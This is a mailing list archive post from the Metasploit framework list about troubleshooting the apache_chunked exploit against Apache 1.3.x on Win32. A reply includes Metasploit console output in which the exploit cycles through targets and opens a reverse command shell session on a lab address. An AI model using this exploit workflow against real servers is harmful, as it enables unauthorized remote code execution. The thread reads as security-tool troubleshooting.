Metasploit mailing list archives

Problem with Apache Win32 Chunked Encoding


From: angelisonline at gmail.com (Mr Gabriel)
Date: Wed, 31 Oct 2007 09:55:02 -0400

What steps did you take to run this exploit?

On 30/10/2007, Patrick Webster <> wrote:

Are you sending traffic via a transparent proxy? You may need to set VHOST
to get past it.

Works ok here - though a different target.

msf exploit(apache_chunked) > rcheck
[*] Serer is probably not vulnerable:
[*] The target is not exploitable.
msf exploit(apache_chunked) > rexploit
[*] Started reverse handler
[*] Trying Apache.org <http://apache.org/> Build 1.3.9-> 1.3.19 [
0x00401151/6 ]
[*] Trying Apache.org <http://apache.org/>Build 1.3.9->1.3.19 [
0x00401151/2 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/0 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/4 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/1 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9- >1.3.19 [
0x00401151/3 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
0x00401151/5 ]
[*] Command shell session 1 opened ( 192.168.146.12:4444 ->
192.168.146.13:1050)

-Patrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071031/91a1a9aa/attachment.htm>


Current thread: